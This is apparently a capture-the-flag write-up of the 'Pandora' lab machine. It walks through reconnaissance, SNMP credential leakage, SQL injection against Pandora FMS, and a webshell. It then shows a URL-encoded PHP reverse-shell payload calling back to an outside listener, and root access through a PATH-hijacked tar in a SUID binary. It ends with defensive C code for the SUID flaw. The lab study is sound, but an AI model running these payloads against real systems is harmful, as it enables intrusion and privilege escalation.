Pandora

Overall

Used Skill

  • nmap UDP scan
  • webshell
  • exploit suid file
  • hijack command

Rating

  • ⭐⭐⭐⭐⭐☆☆☆☆☆

Recon

nmap

  • Port 80 serves only what looks like a static page; its footer contains panda.htb, which looks like a hostname.
~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.136            
[sudo] password for eethan1: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:22 CST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.31% done; ETC: 14:23 (0:00:09 remaining)
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 14:23 (0:00:00 remaining)
Nmap scan report for 10.10.11.136
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/28%OT=22%CT=1%CU=38457%PV=Y%DS=2%DC=T%G=Y%TM=6241548
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   411.40 ms 10.10.14.1
2   411.19 ms 10.10.11.136

  • Switching to a UDP scan finds an SNMP service.
~$ sudo nmap -sU -top-ports=30 panda.htb  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:50 CST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.41s latency).
Not shown: 28 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

sqlmap

  • The home page has a contact form; submitting it sends GET http://panda.htb/?fullName=q&email=q%40e&phone=q&message=q. Running sqlmap against it (sqlmap -u http://10.10.11.136/\?fullName\=%27\&email\=%27%40q\&phone\=%27\&message\=%27) turned up nothing.

path brute

  • Tried brute-forcing sub-paths with gobuster dir -u http://10.10.11.136 -w ~/Documents/wordlists/rockyou.txt; nothing much came up.

Get Shell

  • snmpwalk -v 1 -c public 10.10.11.136 > snmp.txt reveals a username, daniel, and a password, HotelBabylon23.

  • After logging in over SSH, the flag turns out to be under another user.

daniel@pandora:~$ find / -name "user.txt" 2> /dev/null
/home/matt/user.txt
  • Checking the Apache config reveals pandora.panda.htb.

  • Requesting pandora.panda.htb from my own machine does not reach the correct virtual host; it has to be requested from inside the box (not sure why).

  • Set up a SOCKS proxy: ssh -D 8080 daniel@panda.htb

  • Viewed locally, it is a Pandora FMS instance; per "Pandora FMS 742: Critical Code Vulnerabilities Explained", it has an exploitable SQL injection.

$ proxychains sqlmap -u http://pandora.panda.htb/pandora_console/include/chart_generator.php\?session_id\=a -D pandora -T tsessions_php --dump
...
| eteshmpp2shihhj56vgn02jh54 | NULL                                                | 1648459740  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| f609b4t5s8qvv9leh4l9m8opf1 | NULL                                                | 1648459733  |
| fgrsvg6mpb4qe2pifr5knpq8bk | NULL                                                | 1648459629  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
  • Manually taking over a session to become matt is not enough; another exploit uses the SQLi to write an admin session.
# pandora.panda.htb has to point at 127.0.0.1 in /etc/hosts
tmp$ proxychains python sqlpwn.py -t pandora.panda.htb 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
URL:  http://pandora.panda.htb/pandora_console
[+] Sending Injection Payload
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  127.0.0.1:80  ...  OK
[+] Requesting Session
[+] Admin Session Cookie : 1apq13c1m2t5oiie253scsm2ur
[+] Sending Payload 
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  127.0.0.1:80  ...  OK
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://pandora.panda.htb/pandora_console/images/pwn.php?test=
CMD > 
  • This exploit is essentially still a webshell, but for some reason it would not spawn a reverse shell. Reading its code revealed the webshell's location, and opening that in a browser worked. The cmd part is concatenated straight into the URL, so the URL-encoding was probably not handled properly: http://pandora.panda.htb/pandora_console/images/pwn.php?test=php%20-r%20%27%24sock%3Dfsockopen(%2210.10.14.30%22%2C%2031596%20)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Privilege Escalation

  • Look for SUID files and get a proper shell.
tmp$ nc -nvlp 31596                      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::31596
Ncat: Listening on 0.0.0.0:31596
Ncat: Connection from 10.10.11.136.
Ncat: Connection from 10.10.11.136:46924.
/bin/sh: 0: can't access tty; job control turned off

$ python3 -c 'import pty;pty.spawn("/bin/bash")' 

matt@pandora:/var/www/pandora/pandora_console/images$ find / -perm -u=s -type f 2>/dev/null
<nsole/images$ find / -perm -u=s -type f 2>/dev/null  
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

# the shell is restricted at this point
matt@pandora:/var/www/pandora/pandora_console/images$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
<(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null  
warning: commands will be executed using /bin/sh
job 8 at Mon Mar 28 14:19:00 2022
/bin/sh: 0: can't access tty; job control turned off

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$ 

  • pandora_backup is a binary; run directly, it appears to perform a backup. Use ltrace to see what it executes.
matt@pandora:/var/www/pandora/pandora_console/images$ ltrace pandora_backup
ltrace pandora_backup
getuid()                                         = 1000
geteuid()                                        = 1000
setreuid(1000, 1000)                             = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
)                = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
)      = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)     = 39
+++ exited (status 1) +++

  • It calls tar by bare name, which can be hijacked via PATH; this gets root.
matt@pandora:/tmp$ echo "/bin/bash" > tar
echo "/bin/bash" > tar
matt@pandora:/tmp$ chmod 777 tar
chmod 777 tar
matt@pandora:/tmp$ PATH=.:$PATH
PATH=.:$PATH
matt@pandora:/tmp$ pandora_backup
pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp#
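The ltrace output above shows the root cause: a SUID helper hands a bare "tar" to system(), so the caller's PATH decides which file runs with the elevated identity. As an added example (not code from the box or from Pandora FMS; function names and the sample tar invocation are my own), here is a check for that pattern next to a hardened launcher that pins an absolute path, replaces the inherited environment and skips the shell entirely:

```c
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>

/* 1 when the first word of a command line is an absolute path, else 0.
 * A SUID helper that hands a bare name such as "tar" to system() lets
 * the caller's PATH decide which file runs with the elevated identity. */
int command_is_absolute(const char *cmd)
{
    while (*cmd == ' ' || *cmd == '\t')
        cmd++;
    return cmd[0] == '/';
}

/* Hardened launcher: fork + execve with an absolute path, a fixed minimal
 * environment and no shell. execve() does no PATH lookup and the inherited
 * PATH/LD_PRELOAD/IFS are discarded. Returns the child's exit status, -1
 * on failure; relative program names are refused outright. */
int run_pinned(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    if (!command_is_absolute(abs_path))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);
        _exit(127);                     /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Convenience wrapper for a program that takes no arguments. */
int run_pinned_noargs(const char *abs_path)
{
    char *const argv[] = { (char *)abs_path, NULL };
    return run_pinned(abs_path, argv);
}

int main(void)
{
    /* Constructed invocation: the shape a backup helper should use for tar. */
    char *const argv[] = { "tar", "--version", NULL };
    int rc = run_pinned("/usr/bin/tar", argv);
    printf("tar exited with status %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

With this shape, a writable directory prepended to PATH has no effect, because nothing in the child ever consults PATH.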